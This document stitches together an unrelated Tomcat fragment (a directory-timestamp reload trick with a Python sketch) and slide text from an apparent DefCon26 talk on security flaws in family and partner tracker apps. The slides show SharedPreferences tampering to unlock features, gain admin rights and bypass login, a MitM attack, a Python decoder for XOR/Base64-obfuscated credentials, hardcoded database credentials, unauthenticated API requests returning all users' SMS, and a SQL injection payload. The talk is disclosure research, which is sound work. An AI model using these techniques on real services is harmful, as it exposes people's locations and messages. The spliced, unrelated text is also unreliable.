http://xxx/xx.jsp, Tomcat checks whether the JSP file exists, to avoid creating junk directories and files - that is, in org.apache.jasper.servlet.JspServlet#serviceJspFile: if (null == context.getResource(jspUri)) { This part is just initialization; there is nothing else here. Looking further, the answer is in org.apache.jasper.servlet.JspCServletContext#scanForResourceJARs. Got it!!!
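To see the timestamp mechanism from question 1 in isolation, here is a small stand-alone sketch, independent of Tomcat, showing that creating a file inside a watched directory bumps the directory's own modification time - which is exactly what HostConfig#checkResources compares. The directory and file names are just examples.

# Sketch: a directory's mtime changes when a file is created inside it.
import os, time, tempfile

watched = tempfile.mkdtemp(prefix="tomcat-web.xml-")   # stands in for /WEB-INF/tomcat-web.xml/
before = os.stat(watched).st_mtime
print("dir mtime before:", before)

time.sleep(1)                                          # make the change visible at 1 s resolution
with open(os.path.join(watched, "anything.txt"), "w") as f:
    f.write("any content will do")

after = os.stat(watched).st_mtime
print("dir mtime after: ", after)
print("directory looks modified:", after > before)     # True -> checkResources would trigger a reload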
All your family secrets belong to us - Worrisome security issues in tracker apps Siegfried Rasthofer | Fraunhofer SIT, Germany Stephan Huber | Fraunhofer SIT, Germany DefCon26, August 11th 2018 Who are we? § Head of Department Secure Software Engineering § PhD, M.Sc., B.Sc. in computer science § Static and Dynamic Code Analysis § Founder of @TeamSIK and @CodeInspect § Security Researcher @Testlab Mobile Security § Code Analysis Tool development § IOT Stuff § Founder of @TeamSIK Siegfried Stephan 2 Who are we? § Head of Department Secure Software Engineering § PhD, M.Sc., B.Sc. in computer science § Static and Dynamic Code Analysis § Founder of @TeamSIK and @CodeInspect § Security Researcher @Testlab Mobile Security § Code Analysis Tool development § IOT Stuff § Founder of @TeamSIK Siegfried Stephan (creds to: Alex, Daniel, Julien, Julius, Michael, Philipp, Steven, Kevin, Sebald, Ben) 3 Team 4 Beer Announcement 5 Agenda 6 § Introduction/Motivation § Background Information § Bad Client-Side Checks with SharedPreferences § Client-Side and Communication Vulnerabilities § Server-Side Vulnerabilities § Responsible Disclosure Process § Summary Agenda 7 § Introduction/Motivation § Background Information § Bad Client-Side Checks with SharedPreferences § Client-Side and Communication Vulnerabilities § Server-Side Vulnerabilities § Responsible Disclosure Process § Summary Surveillance - Then 1960: Radio receiver inside pipe 1960: Camera inside a pack of cigarettes 1970: Microphone inside a dragonfly 1990: Microphone inside a fake catfish * Source: http://www.businessinsider.com/ 8 Surveillance - Now 9 Sypware/RAT Surveillance - Now 10 Benign Reasons? Sypware/RAT Surveillance - Now 11 Benign Reasons? Family Couple Friends Good vs. Bad 12 Family Couple Friends Sypware/RAT Surveillance - Apps 13 Google PlayStore Android Security Report 2017 Surveillance - Apps 14 Google PlayStore *Android Security Report 2017 15 How well are the tracking data protected? 16 App Name GooglePlay Downloads Couple1Tracker1App 5-101m My1Family1GPS1Tracker KidControll GPS1Tracker Rastrear Celular Por el1Numero Phone1Tracker1By1Number Couple1Vow Real1Time1GPS1Tracker Ilocatemobile 1-5m Family1Locator1(GPS) Free1Cell1Tracker Rastreador de1Novia Phone1Tracker1Free Phone1Tracker1Pro Rastreador de1Celular Avanzado 100-500k Rastreador de1Novia Localiser un1Portable1avec1son1Numero 50-100k Handy1Orten per1Handynr 10-50k Track1My1Family 1k 17 App Name GooglePlay Downloads Couple1Tracker1App 5-101m My1Family1GPS1Tracker KidControll GPS1Tracker Rastrear Celular Por el1Numero Phone1Tracker1By1Number Couple1Vow Real1Time1GPS1Tracker Ilocatemobile 1-5m Family1Locator1(GPS) Free1Cell1Tracker Rastreador de1Novia Phone1Tracker1Free Phone1Tracker1Pro Rastreador de1Celular Avanzado 100-500k Rastreador de1Novia Localiser un1Portable1avec1son1Numero 50-100k Handy1Orten per1Handynr 10-50k Track1My1Family 1k Takeaways 18 It is very easy to… § Enable premium features without paying § Access highly sensitive data of a person § Perform mass surveillance in real-time Agenda 19 § Introduction/Motivation § Background Information § Bad Client-Side Checks with SharedPreferences § Client-Side and Communication Vulnerabilities § Server-Side Vulnerabilities § Responsible Disclosure Process § Summary How does it work? – Very simple 20 push Observer Monitored Person pull Tracking Provider (backend/cloud) What kind of data? 21 push Observer Monitored Person pull What kind of data? 
22 push Observer Monitored Person pull Attack Vectors 23 push Observer Monitored Person pull Attack Vectors 24 push Observer Monitored Person pull Attack Vectors 25 push Observer Monitored Person pull Agenda 26 § Introduction/Motivation § Background Information § Bad Client-Side Checks with SharedPreferences § Client-Side and Communication Vulnerabilities § Server-Side Vulnerabilities § Responsible Disclosure Process § Summary 101 27 1. Authentication Request 2. Authorization Request WTF? 28 1. Request Data 2. Client-Side “Authorization” WTF 1/4 – Enable Premium Features 29 WTF 1/4 – Enable Premium Features 30 N = com.google.android.gms.ads.g; if(!this.n.getBoolean("l_ads", false)) { ... } else { this.N.setVisibility(View.GONE); } WTF 1/4 – Enable Premium Features 31 /data/data/com.bettertomorrowapps.spyyourlovefree/ shared_prefs/loveMonitoring.xml <boolean name="l_location_full" value="false" /> <boolean name="l_fb_full" value="false" /> <boolean name="l_loc" value="false" /> <boolean name="l_sms" value="false" /> <boolean name="l_ads" value="false" /> <boolean name="l_sms_full" value="false" /> <boolean name="l_call" value="false" /> <boolean name="l_fb" value="false" /> N = com.google.android.gms.ads.g; if(!this.n.getBoolean("l_ads", false)) { ... } else { this.N.setVisibility(View.GONE); } SharedPreferences Backup/Restore § Rooted1device: 1. copy1loveMonitoring.xml from1app1folder1to1pc 2. modify1file,1set1false1to1true 3. copy1back1and1overwrite1orig.1file1with1modified1file § Unrooted1device: adb backup adb restore convert * modify file *https://github.com/nelenkov/android-backup-extractor adb tool WTF 1/4 – Enable Premium Features 33 /data/data/com.bettertomorrowapps.spyyourlovefree/ shared_prefs/loveMonitoring.xml <boolean name="l_location_full" value="false" /> <boolean name="l_fb_full" value="false" /> <boolean name="l_loc" value="false" /> <boolean name="l_sms" value="false" /> <boolean name="l_ads" value="false" /> <boolean name="l_sms_full" value="false" /> <boolean name="l_call" value="false" /> <boolean name="l_fb" value="false" /> WTF 1/4 – Enable Premium Features 34 /data/data/com.bettertomorrowapps.spyyourlovefree/ shared_prefs/loveMonitoring.xml <boolean name="l_location_full" value="false" /> <boolean name="l_fb_full" value="false" /> <boolean name="l_loc" value="false" /> <boolean name="l_sms" value="false" /> <boolean name="l_ads" value="false" /> <boolean name="l_sms_full" value="false" /> <boolean name="l_call" value="false" /> <boolean name="l_fb" value="false" /> WTF 1/4 – Enable Premium Features 35 1. Give me all SMS messages WTF 1/4 – Enable Premium Features 36 1. Give me all SMS messages 2. Ok: SMS1, SMS2, SMS3, … WTF 1/4 – Enable Premium Features 37 1. Give me all SMS messages 3. Client “Authorization” Check if(getBoolean(“l_sms_full”) == false) { String[] sms = getAllSMS(); … singleSMS = sms[i].substring(0, 50); } else { //return complete sms } 2. Ok: SMS1, SMS2, SMS3, … WTF 1/4 – Enable Premium Features 38 1. Give me all SMS messages 2. Ok: SMS1, SMS2, SMS3, … 3. 
Client “Authorization” Check if(getBoolean(“l_sms_full”) == false) { String[] sms = getAllSMS(); … singleSMS = sms[i].substring(0, 50); } else { //return complete sms } WTF 2/4 – Admin Privileges 39 • App1supports1two1modes: • parent1(controller/administration)1 • children1(monitored) • Administrator1can1create1new1Administrators • Administrator1can1monitor1all1children WTF 2/4 – Admin Privileges 40 • App1supports1two1modes: • parent1(controller/administration)1 • children1(monitored) • Administrator1can1create1new1Administrators • Administrator1can1monitor1all1children ???? WTF 2/4 – Admin Privileges 41 • App1supports1two1modes: • parent1(controller/administration)1 • children1(monitored) • Administrator1can1create1new1Administrators • Administrator1can1monitor1all1children <boolean name="isLogin" value="true" /> <boolean name="isParent" value="true" /> WTF 3/4 - Remove Lockscreen 42 WTF 3/4 - Remove Lockscreen 43 § After1app1start1the1lock1screen1asks1for1pin ???? Remove Lockscreen 44 § After1app1start1the1lock1screen1asks1for1pin § To1remove1the1lock1screen,1change1SharedPreferencevalue1from1 true to1false <boolean name="pflag" value="true" /> <boolean name="pflag" value="false" /> WTF 4/4 – Authentication Bypass 45 § Same1works with login,1no password required <boolean name="isLogin" value="false" /> <boolean name="isLogin" value="true" /> 46 Do not use SharedPreferences for authorization checks!! Agenda 47 § Introduction/Motivation § Background Information § Bad Client-Side Checks with SharedPreferences § Client-Side and Communication Vulnerabilities § Server-Side Vulnerabilities § Responsible Disclosure Process § Summary Mitm Attack 101 user/app tracking provider (backend/cloud) DATA DATA Mitm Attack 101 user/app tracking provider (backend/cloud) DATA DATA DATA Mitm Attack 101 user/app tracking provider (backend/cloud) DATA DATA DATA Mitm Attack 101 user/app tracking provider (backend/cloud) DATA DATA DATA Mitm Attack 101 user/app tracking provider (backend/cloud) DATA DATA DATA Mitm Attack 101 user/app tracking provider (backend/cloud) DATA DATA DATA Mitm Attack 101 user/app tracking provider (backend/cloud) DATA DATA DATA Mitm Attack 101 user/app tracking provider (backend/cloud) Mitm Attack 101 user/app tracking provider (backend/cloud) evil twin Mitm Attack 101 user/app tracking provider (backend/cloud) evil twin victims view Mitm Attack 101 user/app tracking provider (backend/cloud) DATA DATA DATA DATA evil twin victims view DATA Mitm + Bad Crypto + Obfuscation 59 ?? Mitm + Bad Crypto + Obfuscation 60 ?? user@example.com secure123 Mitm + Bad Crypto + Obfuscation 61 GET /login/?aaa=Bi9srqo&nch=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& tnd=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 http://s9.***********.com/login/?aaa... Mitm + Bad Crypto + Obfuscation 62 GET /login/? aaa=Bi9srqo& nch=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& tnd=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 1. user@example.com secure123 Mitm + Bad Crypto + Obfuscation 63 GET /login/? aaa=Bi9srqo& nch=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& tnd=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 GET /login/? ssp=CFF1CxQoaQcoLWoRaQ%3D%3D%0A& eml=4hBWVqJg4D& mix=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A HTTP/1.1 1. 2. user@example.com secure123 Mitm + Bad Crypto + Obfuscation 64 GET /login/? aaa=Bi9srqo& nch=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& tnd=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 GET /login/? ssp=CFF1CxQoaQcoLWoRaQ%3D%3D%0A& eml=4hBWVqJg4D& mix=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A HTTP/1.1 GET /login/? 
psw=-ZI-WQe& amr=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& rma=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 1. 2. 3. user@example.com secure123 Mitm + Bad Crypto + Obfuscation 65 GET /login/? aaa=Bi9srqo& nch=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& tnd=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 GET /login/? ssp=CFF1CxQoaQcoLWoRaQ%3D%3D%0A& eml=4hBWVqJg4D& mix=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A HTTP/1.1 GET /login/? psw=-ZI-WQe& amr=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& rma=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 GET /login/? aaa=ZTZrO& mag=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& df=CFF1CxQoaQcoLWoRaQ%3D%3D%0A& data=5JFJzgYW_ HTTP/1.1 1. 2. 3. 4. user@example.com secure123 Mitm + Bad Crypto + Obfuscation 66 GET /login/? aaa=Bi9srqo& nch=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& tnd=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 GET /login/? ssp=CFF1CxQoaQcoLWoRaQ%3D%3D%0A& eml=4hBWVqJg4D& mix=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A HTTP/1.1 GET /login/? psw=-ZI-WQe& amr=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& rma=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 GET /login/? aaa=ZTZrO& mag=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& df=CFF1CxQoaQcoLWoRaQ%3D%3D%0A& data=5JFJzgYW_ HTTP/1.1 1. 2. 3. 4. user@example.com secure123 Mitm + Bad Crypto + Obfuscation 67 GET /login/? aaa=Bi9srqo& nch=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& tnd=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 GET /login/? ssp=CFF1CxQoaQcoLWoRaQ%3D%3D%0A& eml=4hBWVqJg4D& mix=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A HTTP/1.1 GET /login/? psw=-ZI-WQe& amr=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& rma=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 GET /login/? aaa=ZTZrO& mag=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& df=CFF1CxQoaQcoLWoRaQ%3D%3D%0A& data=5JFJzgYW_ HTTP/1.1 1. 2. 3. 4. user@example.com secure123 Mitm + Bad Crypto + Obfuscation 68 nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A aaa=Bi9srqo ssp = CFF1CxQoaQcoLWoRaQ%3D%3D%0A mix = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A eml=4hBWVqJg4D amr = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A rma = CFF1CxQoaQcoLWoRaQ%3D%3D%0A psw=-ZI-WQe mag = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A df = CFF1CxQoaQcoLWoRaQ%3D%3D%0A aaa=ZTZrO data=5JFJzgYW_ Mitm + Bad Crypto + Obfuscation 69 mag = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A ssp = CFF1CxQoaQcoLWoRaQ%3D%3D%0A rma = CFF1CxQoaQcoLWoRaQ%3D%3D%0A df = CFF1CxQoaQcoLWoRaQ%3D%3D%0A amr = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A mix = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A Mitm + Bad Crypto + Obfuscation 70 mag = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A ssp = CFF1CxQoaQcoLWoRaQ%3D%3D%0A rma = CFF1CxQoaQcoLWoRaQ%3D%3D%0A df = CFF1CxQoaQcoLWoRaQ%3D%3D%0A amr = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A mix = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A 'k',1'c',1'#',1'a',1'p',1'p',1'#',1'k',1'e',1'y',1'#'} Mitm + Bad Crypto + Obfuscation 71 mag = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A ssp = CFF1CxQoaQcoLWoRaQ%3D%3D%0A rma = CFF1CxQoaQcoLWoRaQ%3D%3D%0A df = CFF1CxQoaQcoLWoRaQ%3D%3D%0A amr = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A mix = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A 'k',1'c',1'#',1'a',1'p',1'p',1'#',1'k',1'e',1'y',1'#'} XOR @ user@example.com Base64 Mitm + Bad Crypto + Obfuscation 72 mag = 
DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A ssp = CFF1CxQoaQcoLWoRaQ%3D%3D%0A rma = CFF1CxQoaQcoLWoRaQ%3D%3D%0A df = CFF1CxQoaQcoLWoRaQ%3D%3D%0A amr = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A mix = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A 'k',1'c',1'#',1'a',1'p',1'p',1'#',1'k',1'e',1'y',1'#'} XOR @ user@example.com Base64 {nl,1bhf,1mag,1bdt,1qac,1trn,1amr,1mix,1nch} Mitm + Bad Crypto + Obfuscation 73 mag = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A ssp = CFF1CxQoaQcoLWoRaQ%3D%3D%0A rma = CFF1CxQoaQcoLWoRaQ%3D%3D%0A df = CFF1CxQoaQcoLWoRaQ%3D%3D%0A amr = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A mix = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A 'k',1'c',1'#',1'a',1'p',1'p',1'#',1'k',1'e',1'y',1'#'} XOR @ user@example.com Base64 {nl,1bhf,1mag,1bdt,1qac,1trn,1amr,1mix,1nch} Random() “=“ + + Mitm + Bad Crypto + Obfuscation 74 mag = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A ssp = CFF1CxQoaQcoLWoRaQ%3D%3D%0A rma = CFF1CxQoaQcoLWoRaQ%3D%3D%0A df = CFF1CxQoaQcoLWoRaQ%3D%3D%0A amr = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A mix = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A XOR Base64 {nl,1bhf,1mag,1bdt,1qac,1trn,1amr,1mix,1nch} Random() “=“ + + {df,1ssp,1fgh,1 drt,1tnd,1rfb,1rma,1vwe,1hac} secure123 ******** Random() “=“ + + 'k',1'c',1'#',1'a',1'p',1'p',1'#',1'k',1'e',1'y',1'#'} user@example.com @ Decryption 75 CFF1CxQoaQcoLWoRaQ%3D%3D%0A DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A Decode Base64 Decryption 76 CFF1CxQoaQcoLWoRaQ%3D%3D%0A DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A XOR Decode Base64 secure123 ******** 'k',1'c',1'#',1'a',1'p',1'p',1'#',1'k',1'e',1'y',1'#'} user@example.com @ Mitm + Bad Crypto + Obfuscation 77 tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A @ ******** Mitm + Bad Crypto + Obfuscation 78 tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A @ ******** aaa=Bi9srqo eml=4hBWVqJg4D aaa=ZTZrO data=5JFJzgYW_ psw=-ZI-WQe Mitm + Bad Crypto + Obfuscation 79 tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A @ ******** aaa=Bi9srqo eml=4hBWVqJg4D psw=-ZI-WQe aaa=ZTZrO data=5JFJzgYW_ {usr,1psw,1uid,1data,1eml,1pss,1foo,1clmn,1count,1nam,1srv,1answ,1aaa1} Random() “=“ + + GenerateRandomString() Mitm + Bad Crypto + Obfuscation 80 tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A @ ******** aaa=Bi9srqo eml=4hBWVqJg4D psw=-ZI-WQe aaa=ZTZrO data=5JFJzgYW_ {usr,1psw,1uid,1data,1eml,1pss,1foo,1clmn,1count,1nam,1srv,1answ,1aaa1} Random() “=“ + + GenerateRandomString() GenerateMultiPairs() Mitm + Bad Crypto + Obfuscation 81 tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A @ ******** aaa=Bi9srqo Shuffle() GET /login/? aaa=Bi9srqo& nch=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& tnd=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 82 Correct Secure Communication § Use1https via1TLSQ1.2Qor1TLSQ1.3 § Valid1server1certificate1 § Implementation1in1Android: URL url = new URL("https://wikipedia.org"); URLConnection urlConnection = url.openConnection(); val url = URL("https://wikipedia.org") val urlConnection: URLConnection = url.openConnection() Java: https://developer.android.com/training/articles/security-ssl#java Kotlin: 84 Realy ? 
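Stripped of the shuffled parameter names, the obfuscation walked through above is nothing more than URL-encoding, Base64 and a repeating-key XOR. A minimal decode sketch follows; the app key is a stand-in, because the '#' characters in the key shown on the slides appear to be redacted.

# Minimal sketch of the decode step described above: URL-decode,
# Base64-decode, then XOR with the repeating app key. APP_KEY is a stand-in;
# the '#' positions of the key on the slides look redacted.
import base64
from itertools import cycle
from urllib.parse import unquote

APP_KEY = b"kc#app#key#"   # assumed / partially redacted

def deobfuscate(value: str) -> bytes:
    # b64decode silently drops the trailing newline left over from the %0A
    blob = base64.b64decode(unquote(value))
    return bytes(b ^ k for b, k in zip(blob, cycle(APP_KEY)))

# The tnd/ssp/rma/df parameters all carried this same blob (the password);
# with the real key this decodes to the plaintext shown on the slides.
print(deobfuscate("CFF1CxQoaQcoLWoRaQ%3D%3D%0A"))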
“Authentication“ “Authentication“ … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection( ); try { … “Authentication“ … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection("jdbc:mysql://mysql.r*****************r.mobi/r*************06", "r*************06", "t**********b"); try { … “Authentication“ … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection("jdbc:mysql://mysql.r*****************r.mobi/r*************06", "r*************06", "t**********b"); try { … database address “Authentication“ … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection("jdbc:mysql://mysql.r*****************r.mobi/r*************06", "r*************06", "t**********b"); try { … database address username password “Authentication“ … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection("jdbc:mysql://mysql.r*****************r.mobi/r*************06", "r*************06", "t**********b"); try { … database address username password “Authentication“ § MySQL1Database1with following table scheme: Field Type Null Key Default Extra nome varchar(50) NO NULL email varchar(30) NO NULL latitude varchar(30) NO NULL longitude varchar(30) NO NULL data varchar(30) NO NULL hora varchar(30) NO NULL codrenavam varchar(30) NO NULL placa Varchar(30) NO PRI NULL “Authentication“ § MySQL1Database1with following table scheme: Field Type Null Key Default Extra nome varchar(50) NO NULL email varchar(30) NO NULL latitude varchar(30) NO NULL longitude varchar(30) NO NULL data varchar(30) NO NULL hora varchar(30) NO NULL codrenavam varchar(30) NO NULL placa Varchar(30) NO PRI NULL “Authentication“ § MySQL1Database1with following table scheme: Field Type Null Key Default Extra nome varchar(50) NO NULL email varchar(30) NO NULL latitude varchar(30) NO NULL longitude varchar(30) NO NULL data varchar(30) NO NULL hora varchar(30) NO NULL codrenavam varchar(30) NO NULL placa Varchar(30) NO PRI NULL “Authentication“ … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection("jdbc:mysql://mysql.r*****************r.mobi/r*************06", "r*************06", "t**********b"); try { … database address username password All1in1all1we had access to over 860.000 location data of different1user,1distributed over the whole world. Prepared Statement ? WTF ! … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection("jdbc:mysql://mysql.r*****************r.mobi/r*************06", "r*************06", "t**********b"); try { PreparedStatement prest = con.prepareStatement("insert rastreadorpessoal values(?)"); 96 Is that all ? Prepared Statement ? WTF ! … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. 
getConnection("jdbc:mysql://mysql.r*****************r.mobi/r*************06", "r*************06", "t**********b"); try { PreparedStatement prest = con.prepareStatement("insert rastreadorpessoal values(?)"); prest.executeUpdate("insert into rastreadorpessoal values('" + this.atributos.getNome() + "', '" + this.atributos.getEmail() + "', '" + this.atributos.getLatitudeStr() + "', '" + this.atributos.getLongitudeStr() + "', '" + this.atributos.getDataBancoStr() + "', '" + this.atributos.getHoraBancoStr() + "', '" + this.atributos.getRenavam() + "', '" + this.atributos.getPlaca() + "')"); prest.close(); con.close(); … Prepared Statement ? WTF ! … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection("jdbc:mysql://mysql.r*****************r.mobi/r*************06", "r*************06", "t**********b"); try { PreparedStatement prest = con.prepareStatement("insert rastreadorpessoal values(?)"); prest.executeUpdate("insert into rastreadorpessoal values('" + this.atributos.getNome() + "', '" + this.atributos.getEmail() + "', '" + this.atributos.getLatitudeStr() + "', '" + this.atributos.getLongitudeStr() + "', '" + this.atributos.getDataBancoStr() + "', '" + this.atributos.getHoraBancoStr() + "', '" + this.atributos.getRenavam() + "', '" + this.atributos.getPlaca() + "')"); prest.close(); con.close(); … 99 Stupid ! Agenda 100 § Introduction/Motivation § Background Information § Bad Client-Side Checks with SharedPreferences § Client-Side and Communication Vulnerabilities § Server-Side Vulnerabilities § Responsible Disclosure Process § Summary 101 101 1. Authentication Request 2. Authorization Request WTF-States of Server-Side Vulnerabilties 102 103 “ Thats a feature “ Not a Bug it‘s a Feature § Web1service1provides1public1access1to1user1tracks,1allowQallQby1default Not a Bug it‘s a Feature § Web1service1provides1public1access1to1user1tracks,1allowQallQby1default Not a Bug it‘s a Feature https://www.greenalp.com/realtimetracker/index.php?viewuser=USERNAME 107 Demo Time ! 108 Is that all ? Public Webinterface 110 Authentication – What? Part1: Who Needs Authentication? http://***********g.azurewebsites.net/trackapplochistory.aspx?userid=********&childid=2********0& currentdate=07/12/2017 Part1: Who Needs Authentication? http://***********g.azurewebsites.net/trackapplochistory.aspx?userid=********&childid=2********0& currentdate=07/12/2017 nothing new Part1: Who Needs Authentication? http://***********g.azurewebsites.net/trackapplochistory.aspx?userid=********&childid=2********0& currentdate=07/12/2017 your user id nothing new Part1: Who Needs Authentication? http://***********g.azurewebsites.net/trackapplochistory.aspx?userid=********&childid=2********0& currentdate=07/12/2017 your user id id1of1the1person1to1track nothing new Part1: Who Needs Authentication? http://***********g.azurewebsites.net/trackapplochistory.aspx?userid=********&childid=2********0& currentdate=07/12/2017 your user id id1of1the1person1to1track requested1date nothing new Part1: Who Needs Authentication? attacker tracker backend Response1for http://***********g.azurewebsites.net/... 07:471PM*49.8715330929084,8.639047788304 07:521PM*49.8731935027927,8.63498598738923 07:531PM*49.871533247265,8.63904788614738 … List1of the complete track Part1: Who Needs Authentication? Part2: Who Needs Authentication? § Tracker1has1messenger1functions,1e.g.1send1messages1or1exchange1 images § How1do1we1get1the1messages1for1a1user1? Part2: Who Needs Authentication? 
§ Tracker1has1messenger1functions,1e.g.1send1messages1or1exchange1 images § How1do1we1get1the1messages1for1a1user1? attacker tracker backend POST1/***************/api/get_sms HTTP/1.1 {"cnt":"100","user_id":"123456"} result counter Part2: Who Needs Authentication? § Tracker1has1messenger1functions,1e.g.1send1messages1or1exchange1 images § There1is1no1authentication,1all1messages11! attacker tracker backend List1of sms with: • user_id • timestamp • content • phone number Part2: Who Needs Authentication? § What1happens1if1user_id is1empty1? attacker tracker backend POST1/***************/api/get_sms HTTP/1.1 {"cnt":"100","user_id":""} Part2: Who Needs Authentication? § What happens if user_id is empty ? attacker tracker backend AllQSMSQof allQusers ! 123 SQL – Very Simple Backend Attack to Track all User http://*********/FindMyFriendB/fetch_family.php?mobile=<mobileQ number> Backend1API extraction Backend Attack to Track all User [{"to_username":“*****","to_mobile":"9********9","lat":"*0.2916455"," lon":"7*.0521764","time":"12:0,27-12-2016"}] http://*********/FindMyFriendB/fetch_family.php?mobile=<mobileQ number> Backend1API extraction Simple SQL Injection http://*********/FindMyFriendB/fetch_family.php?mobile='Q or ''Q=' Backend1API extraction Simple SQL Injection http://*********/FindMyFriendB/fetch_family.php?mobile='Q or ''Q=' Backend1API extraction 